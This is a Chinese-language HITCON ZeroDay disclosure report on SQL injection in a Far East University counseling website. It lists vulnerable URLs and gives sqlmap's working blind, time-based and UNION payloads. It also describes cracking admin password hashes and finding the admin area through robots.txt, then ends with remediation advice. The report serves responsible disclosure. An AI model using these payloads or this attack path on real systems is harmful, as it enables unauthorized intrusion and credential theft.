Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00092
- 發信 Vendor: 遠東科技大學
- Title: 遠東科技大學 諮商輔導中心 IN ARK ,網站參數存在 SQL injection
- Introduction: 網站參數存在 SQL injection
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2022/02/13 23:54:55 : 新提交 (由 P@ssw0rd 更新此狀態)
- 2022/02/18 14:25:38 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/18 16:00:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/18 16:00:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/18 16:00:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/04/15 03:00:13 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00092
- 通報者:wucy0612 (P@ssw0rd)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
http://www.inark.feu.edu.tw/feucgc/hot_article.php?id=5
http://www.inark.feu.edu.tw/feucgc/article.php?id=461
http://www.inark.feu.edu.tw/feucgc/activity.php?id=467
敘述
接續前輩 https://zeroday.hitcon.org/vulnerability/ZD-2018-00485 ,瀏覽以下各網頁均會發生
Parameter: class (GET)
http://www.inark.feu.edu.tw/feucgc/article_list.php?class=1
Parameter: id (GET)
http://www.inark.feu.edu.tw/feucgc/hot_article.php?id=5
http://www.inark.feu.edu.tw/feucgc/article.php?id=461
http://www.inark.feu.edu.tw/feucgc/activity.php?id=467
在加上' 均會完整顯示原來頁面
帶入 SQLMAP
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5' AND 6887=6887 AND 'lUhC'='lUhC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=5' AND (SELECT 8785 FROM (SELECT(SLEEP(5)))xLAN) AND 'zkie'='zkie
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=5' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767171,0x6646746d7a7467717646654a427650484459784f7045484e484c6d5447794a766270684861515156,0x7170767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -available databases [3]:
feu_cgc
information_schema
test
Database: feu_cgc
[20 tables]
使用 gerent 資料表取得帳號及密碼
除了editor暫時無法解析外 admin 跟 randy 的密碼都可以成功解析
找不到管理者登入頁 那找找... robots.txt 禁止搜尋特定目錄 加上上述的帳號及密碼可成功登入管理區
當網站管理者保護特定目錄列於robots.txt,亦可能該文件中也可機會透露出有效的訊息
請參考 Google 如何解讀 robots.txt 規格 https://developers.google.com/search/docs/advanced/guidelines/get-started?hl=zh-tw
修補建議
1.處理SQLI: 參數過濾及禁止
2.弱密碼: 資料庫gerent表格的密碼欄位,雖有hash但使用者密碼強度不夠,仍容易被解析成功,如editor暫時無法解析外 admin 跟 randy 的密碼都可以成功解析,強烈建議加強密碼原則
3.原本停止下一步因為找不到管理者登入頁,找到robots.txt檔案,驗證帳號密碼是正確的,當網站管理者保護特定目錄列於robots.txt,亦可能該文件中也可機會透露出有效的訊息,請衡量加上管理者區僅限管理者IP或校內IP方得連結多一層保護
4. 本漏洞 https://zeroday.hitcon.org/vulnerability/ZD-2018-00485 距今近四年了,沒進行處理?